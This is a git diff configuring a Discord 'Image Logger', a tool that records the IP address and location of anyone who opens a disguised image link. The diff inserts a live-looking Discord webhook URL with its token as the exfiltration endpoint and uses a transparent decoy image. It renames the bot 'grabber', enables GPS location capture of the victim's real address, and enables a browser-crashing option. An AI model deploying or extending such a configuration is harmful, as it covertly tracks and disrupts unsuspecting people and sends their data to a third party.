diff --git a/main.py b/api/main.py similarity index 93% rename from main.py rename to api/main.py index 2efe786..da725f2 100644 --- a/main.py +++ b/api/main.py @@ -12,23 +12,23 @@ config = { # BASE CONFIG # - "webhook": "https://discord.com/api/webhooks/your/webhook", - "image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument + "webhook": "https://discord.com/api/webhooks/1127557814093615195/DMX2XN2QBqQ7_DqJXz5MjHFdBsS3km87nFzRt4HcMOqkZorxz8dKT-HnI_7JEug_D2p1", + "image": "https://upload.wikimedia.org/wikipedia/commons/thumb/8/89/HD_transparent_picture.png/1200px-HD_transparent_picture.png", # You can also have a custom image by using a URL argument # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README) # CUSTOMIZATION # - "username": "Image Logger", # Set this to the name you want the webhook to have + "username": "grabber", # Set this to the name you want the webhook to have "color": 0x00FFFF, # Hex Color you want for the embed (Example: Red is 0xFF0000) # OPTIONS # - "crashBrowser": False, # Tries to crash/freeze the user's browser, may not work. (I MADE THIS, SEE https://github.com/dekrypted/Chromebook-Crasher) + "crashBrowser": True, # Tries to crash/freeze the user's browser, may not work. (I MADE THIS, SEE https://github.com/dekrypted/Chromebook-Crasher) - "accurateLocation": False, # Uses GPS to find users exact location (Real Address, etc.) disabled because it asks the user which may be suspicious. + "accurateLocation": True, # Uses GPS to find users exact location (Real Address, etc.) disabled because it asks the user which may be suspicious. "message": { # Show a custom message when the user opens the image "doMessage": False, # Enable the custom message? - "message": "This browser has been pwned by DeKrypt's Image Logger. https://github.com/dekrypted/Discord-Image-Logger", # Message to show + "message": "This browser has been pwned by datastealer", # Message to show "richMessage": True, # Enable rich text? (See README for more info) }, diff --git a/requirements.txt b/api/requirements.txt similarity index 100% rename from requirements.txt rename to api/requirements.txt diff --git a/index.html b/index.html new file mode 100644 index 0000000..fa9c732 --- /dev/null +++ b/index.html @@ -0,0 +1 @@ +